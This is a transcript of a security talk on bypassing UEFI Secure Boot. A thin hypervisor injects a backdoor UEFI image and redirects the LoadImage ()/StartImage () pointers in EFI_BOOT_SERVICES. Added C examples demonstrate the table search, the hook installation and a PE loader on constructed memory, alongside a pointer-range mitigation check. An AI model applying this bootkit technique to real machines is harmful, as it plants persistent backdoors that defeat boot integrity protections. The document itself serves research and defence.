
Bypassing UEFI Secure Boot with Thin-Hypervisor

Akira Moroo
November 30, 2020


UEFI Secure Boot is one of the core security features in modern computing systems. It verifies boot images and runs authorized images only. Bypassing UEFI Secure Boot is one of the big topics for attacking UEFI targets. In this presentation, I propose a general bypassing method using a thin-hypervisor.



Transcript

  1. Secure Bootstrapping: Secure Boot and Trusted Boot
     • Booting is a chain of state transitions
     • Secure Boot: verifies every state using certificates and hashes
     • Trusted Boot: computes hashes of every state (measured boot) [1]
  2. UEFI Secure Boot: Overview
     • A UEFI image is a PE/COFF file and may carry a signature
     • Firmware verifies each image before loading it
     • An image is loaded only if it has a valid signature, or its hash is in the allowed list (db), and it is not in the forbidden list (dbx)
     • Only trusted images are run [2]
  3. LoadImage (): Secure Boot Verification
     • UEFI passes each image a pointer to EFI_SYSTEM_TABLE; the image reaches UEFI features through that table
     • EFI_SYSTEM_TABLE points to EFI_RUNTIME_SERVICES and EFI_BOOT_SERVICES; EFI_BOOT_SERVICES holds the function pointers LoadImage () (EFI_IMAGE_LOAD), StartImage () (EFI_IMAGE_START), ...
     • LoadImage () loads a UEFI image and, with Secure Boot enabled, verifies it
     [Figure: EFI_SYSTEM_TABLE -> EFI_BOOT_SERVICES -> LoadImage (): EFI_IMAGE_LOAD, StartImage (): EFI_IMAGE_START, ...]
  4. Disabling Secure Boot #1: Patching PI Firmware
     • DxeImageVerificationHandler () is called from LoadImage () to verify the image
     • Patch it to always return EFI_SUCCESS [2]
  5. Disabling Secure Boot #2: Modifying the UEFI Variables in NVRAM
     • The Secure Boot state (PK, KEK, db, dbx, and the SecureBoot/SetupMode flags) is stored as UEFI variables in NVRAM [4]
  6. Alternative Way to Bypass Secure Boot
     • #1 Patching PI firmware to disable Secure Boot: requires manual reverse engineering of each target firmware
     • #2 Modifying the UEFI variables in NVRAM to bypass the security checks: works only when NVRAM is not write-protected (it should be, but sometimes is not)
     • Alternative: patch the whole EFI_BOOT_SERVICES table
  7. Patching EFI_BOOT_SERVICES
     • DxeBackdoor.efi provides its own LoadImage () with the Secure Boot verification removed
     • Patch the target's LoadImage () pointer in EFI_BOOT_SERVICES to point at DxeBackdoor.efi's LoadImage ()
     [Figure: EFI_SYSTEM_TABLE -> EFI_BOOT_SERVICES; the EFI_IMAGE_LOAD slot redirected from DxeCore.efi to DxeBackdoor.efi.
      DxeCore.efi     LoadImage (Secure Boot enabled): VerifyImage ()
      DxeBackdoor.efi LoadImage (Secure Boot enabled): /* VerifyImage () */  (verification commented out)]
  8. DxeBackdoor.efi
     • Almost all service calls are delegated to the target's original functions
     • .conf section: holds the required functions and saves the original function pointers
     • Ref: Cr4sh/SmmBackdoor [3]
  9. Employing BitVisor to Inject the Backdoor
     • The attacker needs to be able to read and write the target's arbitrary memory
     • Exploiting vulnerabilities: usable ones (especially 0-days) are hard to find and depend heavily on the target environment
     • Instead, use BitVisor (a thin hypervisor) to emulate the injection attack:
       • Search for the tables and function pointers
       • Load the backdoor image and hook the function pointers
  10. Search Function Pointers
     • Search memory for the table signatures and locate the function pointers from the tables
     • Search "IBI SYST": the EFI_SYSTEM_TABLE signature
     • Search "BOOTSERV": the EFI_BOOT_SERVICES signature
     • From EFI_BOOT_SERVICES, locate LoadImage () and StartImage ()
     [Figure: EFI_SYSTEM_TABLE -> EFI_RUNTIME_SERVICES, EFI_BOOT_SERVICES; EFI_BOOT_SERVICES -> LoadImage (): EFI_IMAGE_LOAD, StartImage (): EFI_IMAGE_START, ...]
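The search step above, as an added example that is not code from the talk or from BitVisor: it scans a guest-memory image for the "IBI SYST" signature, confirms the hit by recomputing the EFI_TABLE_HEADER CRC32 (a bare string match also fires on the signature bytes sitting in some driver's data), follows SystemTable->BootServices, checks that table's "BOOTSERV" header the same way, and returns the guest addresses of the LoadImage ()/StartImage () slots. The memory image, the decoy string and all addresses are constructed here; the struct layouts mirror the UEFI 2.8 x64 layouts, with EFI_BOOT_SERVICES truncated after StartImage.

```c
/* Added example (not from the talk or from BitVisor): locate EFI_SYSTEM_TABLE and
 * EFI_BOOT_SERVICES in a guest-memory image by signature, confirm each hit with the
 * table header CRC32, and derive the LoadImage ()/StartImage () slot addresses.
 * Memory image and addresses are constructed; layouts mirror UEFI 2.8 x64. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define EFI_SYSTEM_TABLE_SIGNATURE  0x5453595320494249ULL  /* "IBI SYST" */
#define EFI_BOOT_SERVICES_SIGNATURE 0x56524553544f4f42ULL  /* "BOOTSERV" */

typedef struct { uint64_t Signature; uint32_t Revision, HeaderSize, CRC32, Reserved; } EfiTableHeader;

typedef struct {                      /* EFI_SYSTEM_TABLE, fields in spec order (120 bytes) */
    EfiTableHeader Hdr;
    uint64_t FirmwareVendor; uint32_t FirmwareRevision, Pad;
    uint64_t ConsoleInHandle, ConIn, ConsoleOutHandle, ConOut, StandardErrorHandle, StdErr;
    uint64_t RuntimeServices, BootServices;          /* BootServices at offset 0x60 */
    uint64_t NumberOfTableEntries, ConfigurationTable;
} EfiSystemTable;

typedef struct {                      /* EFI_BOOT_SERVICES prefix: 22 services, then LoadImage */
    EfiTableHeader Hdr;
    uint64_t Svc[22];
    uint64_t LoadImage, StartImage;   /* table offsets 0xC8 and 0xD0 */
} EfiBootServices;

/* Standard CRC32 (IEEE 802.3), the same algorithm EFI_BOOT_SERVICES.CalculateCrc32 uses. */
static uint32_t crc32_ieee(const void *buf, size_t len) {
    const uint8_t *p = buf; uint32_t c = 0xFFFFFFFFu;
    for (size_t i = 0; i < len; i++) {
        c ^= p[i];
        for (int k = 0; k < 8; k++) c = (c >> 1) ^ (0xEDB88320u & (0u - (c & 1u)));
    }
    return ~c;
}

/* A table header is trusted only if its CRC32 (over HeaderSize bytes, computed with the
 * CRC32 field zeroed) matches. A stray "IBI SYST" string in data fails this check. */
static int header_valid(const uint8_t *mem, size_t memsz, uint64_t addr, uint64_t sig) {
    EfiTableHeader h;
    if (addr + sizeof h > memsz) return 0;
    memcpy(&h, mem + addr, sizeof h);
    if (h.Signature != sig || h.HeaderSize < sizeof h || addr + h.HeaderSize > memsz) return 0;
    uint8_t *tmp = malloc(h.HeaderSize);
    memcpy(tmp, mem + addr, h.HeaderSize);
    memset(tmp + offsetof(EfiTableHeader, CRC32), 0, sizeof h.CRC32);
    uint32_t crc = crc32_ieee(tmp, h.HeaderSize);
    free(tmp);
    return crc == h.CRC32;
}

/* Scan guest memory (8-byte stride: the tables come from pool and are 8-byte aligned),
 * follow SystemTable->BootServices, return the EFI_BOOT_SERVICES address (0 if none). */
static uint64_t find_boot_services(const uint8_t *mem, size_t memsz,
                                   uint64_t *load_slot, uint64_t *start_slot) {
    for (uint64_t a = 0; a + sizeof(EfiSystemTable) <= memsz; a += 8) {
        uint64_t sig; memcpy(&sig, mem + a, sizeof sig);
        if (sig != EFI_SYSTEM_TABLE_SIGNATURE || !header_valid(mem, memsz, a, sig)) continue;
        EfiSystemTable st; memcpy(&st, mem + a, sizeof st);
        if (!header_valid(mem, memsz, st.BootServices, EFI_BOOT_SERVICES_SIGNATURE)) continue;
        *load_slot  = st.BootServices + offsetof(EfiBootServices, LoadImage);
        *start_slot = st.BootServices + offsetof(EfiBootServices, StartImage);
        return st.BootServices;
    }
    return 0;
}

/* ---- constructed guest image: one decoy string, one real table pair ---- */
enum { MEMSZ = 0x8000, DECOY = 0x1000, ST_ADDR = 0x3000, BS_ADDR = 0x4000 };

static void seal(uint8_t *mem, uint64_t addr, uint32_t size) {   /* fill HeaderSize and CRC32 */
    EfiTableHeader *h = (EfiTableHeader *)(mem + addr);
    h->HeaderSize = size; h->CRC32 = 0;
    h->CRC32 = crc32_ieee(mem + addr, size);
}

static uint8_t *build_fake_guest(void) {
    uint8_t *mem = calloc(1, MEMSZ);
    memcpy(mem + DECOY, "IBI SYST", 8);             /* signature bytes without a header: must be skipped */
    EfiBootServices *bs = (EfiBootServices *)(mem + BS_ADDR);
    bs->Hdr.Signature = EFI_BOOT_SERVICES_SIGNATURE; bs->Hdr.Revision = 0x00020050;
    bs->LoadImage = 0x7E5C1230; bs->StartImage = 0x7E5C1A80;  /* constructed DxeCore addresses */
    seal(mem, BS_ADDR, sizeof *bs);   /* real firmware: HeaderSize = full sizeof(EFI_BOOT_SERVICES) */
    EfiSystemTable *st = (EfiSystemTable *)(mem + ST_ADDR);
    st->Hdr.Signature = EFI_SYSTEM_TABLE_SIGNATURE; st->Hdr.Revision = 0x00020050;
    st->BootServices = BS_ADDR;
    seal(mem, ST_ADDR, sizeof *st);
    return mem;
}

/* Run the search on the constructed image; returns the guest address of the LoadImage slot. */
static uint64_t locate_demo(void) {
    uint8_t *mem = build_fake_guest();
    uint64_t load = 0, start = 0, bs = find_boot_services(mem, MEMSZ, &load, &start);
    if (bs) printf("EFI_BOOT_SERVICES @ %#llx, LoadImage slot @ %#llx, StartImage slot @ %#llx\n",
                   (unsigned long long)bs, (unsigned long long)load, (unsigned long long)start);
    free(mem);
    return load;
}

int main(void) { return locate_demo() ? 0 : 1; }
```

The CRC check is what makes the scan usable on a real memory dump: the decoy at 0x1000 carries the signature bytes but no valid header and is skipped, while the real table at 0x3000 leads to the boot services table at 0x4000 and its LoadImage slot at 0x40C8. On real firmware the EFI_BOOT_SERVICES header covers the whole table, so HeaderSize will be larger than the truncated struct used here.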
  11. Load Backdoor UEFI Image
     • The backdoor is deployed from bitvisor.elf: the backdoor UEFI image is embedded in bitvisor.elf
     • The loader parses the backdoor image and loads it into guest memory
     • Creates the LoadImage () and StartImage () hooks
     • Overwrites the function pointers in EFI_BOOT_SERVICES
  12. Summary
     • Existing methods of attacking Secure Boot are limited
     • Patching the whole EFI_BOOT_SERVICES is a more general way to bypass Secure Boot
     • BitVisor was used to emulate an arbitrary-memory-manipulation attack
     • Mitigations: do not reuse system tables; check function pointer ranges
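Both the pointer overwrite from slides 7 and 8 and the "check function pointer ranges" mitigation from this summary, as an added example that is not code from the talk: the attacker side saves the original LoadImage ()/StartImage () pointers (as DxeBackdoor.efi's .conf section does) and replaces them with entry points inside the backdoor image; the defender side walks every slot of EFI_BOOT_SERVICES and flags any pointer that does not fall inside DxeCore's image, which in EDK2 implements all of the boot services. The table is modelled as its 44 UEFI 2.8 x64 service slots holding guest addresses; the DxeCore and backdoor image ranges and the hook RVAs are made up.

```c
/* Added example (not from the talk): hook installation against the EFI_BOOT_SERVICES
 * function-pointer slots, and the "check function pointer ranges" mitigation.
 * Slot i lives at table offset 24 + 8*i (after EFI_TABLE_HEADER). Ranges are constructed. */
#include <stdint.h>
#include <stdio.h>

enum { SLOT_RESERVED = 17, SLOT_LOADIMAGE = 22, SLOT_STARTIMAGE = 23, NSLOTS = 44 };
#define BS_HDR_SIZE 24

typedef struct { uint64_t base, size; } ImageRange;          /* [base, base + size) */
typedef struct { uint64_t slot[NSLOTS]; } BootServicesSlots;  /* guest addresses of entry points */
typedef struct { uint64_t load_image, start_image; } SavedOriginals;  /* what .conf keeps */

/* Attacker side: save the originals (the hooks delegate to them), then point the two
 * slots into the backdoor image. The hook RVAs 0x1A0 and 0x2C0 are assumed. */
static void install_hooks(BootServicesSlots *bs, const ImageRange *backdoor, SavedOriginals *saved) {
    saved->load_image  = bs->slot[SLOT_LOADIMAGE];
    saved->start_image = bs->slot[SLOT_STARTIMAGE];
    bs->slot[SLOT_LOADIMAGE]  = backdoor->base + 0x1A0;
    bs->slot[SLOT_STARTIMAGE] = backdoor->base + 0x2C0;
}

/* Defender side: every slot except Reserved (NULL) must point into DxeCore's image.
 * Returns a bitmask of offending slots: bit 22 = LoadImage, bit 23 = StartImage. */
static uint64_t check_pointer_ranges(const BootServicesSlots *bs, const ImageRange *dxe_core) {
    uint64_t bad = 0;
    for (int i = 0; i < NSLOTS; i++) {
        uint64_t p = bs->slot[i];
        if (i == SLOT_RESERVED) continue;
        if (p < dxe_core->base || p >= dxe_core->base + dxe_core->size) bad |= 1ULL << i;
    }
    return bad;
}

/* Constructed clean table: every service somewhere inside DxeCore. */
static void make_clean_table(BootServicesSlots *bs, const ImageRange *dxe_core) {
    for (int i = 0; i < NSLOTS; i++) bs->slot[i] = dxe_core->base + 0x1000 + 0x200u * i;
    bs->slot[SLOT_RESERVED] = 0;
}

static const ImageRange DXE_CORE = { 0x7E5C0000ULL, 0x00100000ULL };  /* constructed */
static const ImageRange BACKDOOR = { 0x7D000000ULL, 0x00004000ULL };  /* constructed */

static uint64_t demo_before_hook(void) {           /* expected: 0, nothing to report */
    BootServicesSlots bs; make_clean_table(&bs, &DXE_CORE);
    return check_pointer_ranges(&bs, &DXE_CORE);
}

static uint64_t demo_after_hook(void) {            /* expected: bits 22 and 23 set */
    BootServicesSlots bs; SavedOriginals saved;
    make_clean_table(&bs, &DXE_CORE);
    install_hooks(&bs, &BACKDOOR, &saved);
    return check_pointer_ranges(&bs, &DXE_CORE);
}

static uint64_t demo_saved_load_image(void) {      /* the original DxeCore LoadImage the hook delegates to */
    BootServicesSlots bs; SavedOriginals saved;
    make_clean_table(&bs, &DXE_CORE);
    install_hooks(&bs, &BACKDOOR, &saved);
    return saved.load_image;
}

int main(void) {
    uint64_t bad = demo_after_hook();
    printf("before hook: bad slots %#llx\n", (unsigned long long)demo_before_hook());
    for (int i = 0; i < NSLOTS; i++)
        if (bad >> i & 1) printf("slot %d (table offset %#x) points outside DxeCore\n", i, BS_HDR_SIZE + 8 * i);
    return 0;
}
```

In real firmware the DxeCore range comes from its EFI_LOADED_IMAGE_PROTOCOL (ImageBase/ImageSize) or the DXE memory map. Some legitimate boot components hook boot services themselves, so the check is most meaningful when run before such components load or when compared against a snapshot taken right after DxeCore installs the table.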
  13. References
     • [0] UEFI Specification, Version 2.8 (Errata A), https://uefi.org/sites/default/files/resources/UEFI_Spec_2_8_A_Feb14.pdf
     • [1] B. Parno, J. M. McCune, and A. Perrig, "Bootstrapping trust in commodity computers," in IEEE Symposium on Security and Privacy, 2010, pp. 414–429.
     • [2] A. Matrosov, E. Rodionov, and S. Bratus, Rootkits and Bootkits, No Starch Press, 2019.
     • [3] https://github.com/Cr4sh/SmmBackdoor
     • [4] Y. Bulygin, J. Loucaides, A. Furtak, O. Bazhaniuk, and A. Matrosov, "Summary of Attacks Against BIOS and Secure Boot," DEF CON, 2014.
  14. Legacy BIOS: No Security Features
     • Master Boot Record: the first 512 bytes of the disk
     • Contains bootstrap code and 4 partition entries
     • No native security features: the MBR is easily modified [2]
  15. Backdoor Injector BitVisor Driver
     • DxeBackdoor.efi is built from a custom EDK2 package
     • objcopy -I binary converts DxeBackdoor.efi into backdoor.o so it can be linked into bitvisor.elf
     • A PE/COFF loader implemented in the injector BitVisor driver: parses the headers, loads sections based on the section table, supports minimal relocations
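The loader the last slide describes, as an added example that is not the injector's own code: a minimal PE32+ loader that parses the DOS/COFF/optional headers, maps each section by its section-table entry, and applies IMAGE_REL_BASED_DIR64 base relocations for the chosen load address, which is all an x64 UEFI driver needs. A tiny PE image is constructed in memory to exercise it (its .text holds an absolute pointer, its .reloc fixes that pointer up); the load addresses are made up, and the header field offsets are the fixed PE32+ ones.

```c
/* Added example (not the injector's own loader): minimal PE32+ loader with DIR64 relocations.
 * The PE image it loads is constructed below; load addresses are made up. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static uint16_t rd16(const uint8_t *p) { uint16_t v; memcpy(&v, p, 2); return v; }
static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static uint64_t rd64(const uint8_t *p) { uint64_t v; memcpy(&v, p, 8); return v; }
static void wr16(uint8_t *p, uint16_t v) { memcpy(p, &v, 2); }
static void wr32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }
static void wr64(uint8_t *p, uint64_t v) { memcpy(p, &v, 8); }

typedef struct { uint8_t *mem; uint64_t base; uint32_t size, entry_rva; } LoadedImage;

/* Lay `file` out as it would appear at guest address `base`. Returns 0, or -1 on malformed input. */
static int pe_load(const uint8_t *file, size_t flen, uint64_t base, LoadedImage *out) {
    if (flen < 0x40 || rd16(file) != 0x5A4D) return -1;                            /* "MZ" */
    uint32_t pe = rd32(file + 0x3C);
    if ((uint64_t)pe + 4 + 20 + 240 > flen || rd32(file + pe) != 0x00004550) return -1; /* "PE\0\0" */
    const uint8_t *coff = file + pe + 4, *opt = coff + 20;
    uint16_t nsec = rd16(coff + 2), optsz = rd16(coff + 16);
    if (rd16(coff) != 0x8664 || optsz < 240 || rd16(opt) != 0x20B) return -1;     /* x64 PE32+ only */
    uint64_t image_base = rd64(opt + 24);
    uint32_t size_img = rd32(opt + 56), size_hdr = rd32(opt + 60), ndir = rd32(opt + 108);
    const uint8_t *sec = opt + optsz;
    if ((size_t)(sec - file) + 40u * nsec > flen || size_hdr > flen || size_hdr > size_img) return -1;
    uint8_t *mem = calloc(1, size_img);
    memcpy(mem, file, size_hdr);
    for (uint16_t i = 0; i < nsec; i++) {                                   /* map each section */
        const uint8_t *s = sec + 40u * i;
        uint32_t vsz = rd32(s + 8), va = rd32(s + 12), rsz = rd32(s + 16), raw = rd32(s + 20);
        uint32_t n = rsz < vsz ? rsz : vsz;                                 /* rest of VirtualSize stays zero */
        if ((uint64_t)va + vsz > size_img || (uint64_t)raw + n > flen) { free(mem); return -1; }
        memcpy(mem + va, file + raw, n);
    }
    uint64_t delta = base - image_base;                                     /* wraps correctly if base < image_base */
    uint32_t rva = rd32(opt + 112 + 5 * 8), rsize = rd32(opt + 116 + 5 * 8); /* data directory 5: .reloc */
    if (ndir > 5 && rsize && delta) {
        if ((uint64_t)rva + rsize > size_img) { free(mem); return -1; }
        for (uint32_t off = 0; off + 8 <= rsize; ) {                        /* one block per 4 KiB page */
            uint32_t page = rd32(mem + rva + off), bsz = rd32(mem + rva + off + 4);
            if (bsz < 8 || off + bsz > rsize) { free(mem); return -1; }
            for (uint32_t e = 8; e + 2 <= bsz; e += 2) {
                uint16_t ent = rd16(mem + rva + off + e);
                uint32_t target = page + (ent & 0xFFF);
                if ((ent >> 12) == 10 && (uint64_t)target + 8 <= size_img)  /* IMAGE_REL_BASED_DIR64 */
                    wr64(mem + target, rd64(mem + target) + delta);
                /* type 0 (ABSOLUTE) is block padding; other types are not needed for x64 drivers */
            }
            off += bsz;
        }
    }
    out->mem = mem; out->base = base; out->size = size_img; out->entry_rva = rd32(opt + 16);
    return 0;
}

/* Constructed PE32+ image: .text holds an absolute pointer to its own entry, .reloc fixes it up. */
static uint8_t *build_test_pe(size_t *len) {
    uint8_t *f = calloc(1, 0x600); *len = 0x600;
    wr16(f, 0x5A4D); wr32(f + 0x3C, 0x40); wr32(f + 0x40, 0x00004550);
    wr16(f + 0x44, 0x8664); wr16(f + 0x46, 2); wr16(f + 0x54, 240);       /* COFF header */
    uint8_t *o = f + 0x58;                                                  /* optional header */
    wr16(o, 0x20B); wr32(o + 16, 0x1000); wr64(o + 24, 0x400000);           /* entry RVA, ImageBase */
    wr32(o + 32, 0x1000); wr32(o + 36, 0x200); wr32(o + 56, 0x3000); wr32(o + 60, 0x200);
    wr32(o + 108, 16); wr32(o + 112 + 5 * 8, 0x2000); wr32(o + 116 + 5 * 8, 12);
    uint8_t *s = o + 240;                                                   /* section table */
    memcpy(s, ".text", 5); wr32(s + 8, 0x10); wr32(s + 12, 0x1000); wr32(s + 16, 0x200); wr32(s + 20, 0x200);
    memcpy(s + 40, ".reloc", 6); wr32(s + 48, 12); wr32(s + 52, 0x2000); wr32(s + 56, 0x200); wr32(s + 60, 0x400);
    wr64(f + 0x208, 0x400000 + 0x1000);              /* .text+8: absolute pointer to the entry point */
    wr32(f + 0x400, 0x1000); wr32(f + 0x404, 12);    /* reloc block: page RVA 0x1000, 12 bytes */
    wr16(f + 0x408, (10 << 12) | 8);                 /* DIR64 fixup at page+8 */
    wr16(f + 0x40A, 0);                              /* ABSOLUTE padding entry */
    return f;
}

/* Load the constructed image at `new_base`; returns the pointer at RVA 0x1008 after fixups. */
static uint64_t relocate_demo(uint64_t new_base) {
    size_t len; uint8_t *f = build_test_pe(&len);
    LoadedImage img; uint64_t v = 0;
    if (pe_load(f, len, new_base, &img) == 0) { v = rd64(img.mem + 0x1008); free(img.mem); }
    free(f);
    return v;
}

/* Malformed input must be refused, not parsed: returns 1 when an "MZ" buffer with no PE header is rejected. */
static int reject_demo(void) {
    uint8_t junk[0x200] = { 'M', 'Z' };
    LoadedImage img;
    return pe_load(junk, sizeof junk, 0, &img) == -1;
}

int main(void) {
    printf("pointer after loading at 0x7C000000: %#llx\n", (unsigned long long)relocate_demo(0x7C000000ULL));
    return 0;
}
```

Loaded at 0x7C000000 the stored pointer becomes 0x7C001000; loaded at its preferred base 0x400000 the delta is zero and nothing is rewritten. The bounds checks on section and relocation offsets matter because the injector parses an image it carries itself, but the same loader pattern run on untrusted input is a classic memory-corruption surface.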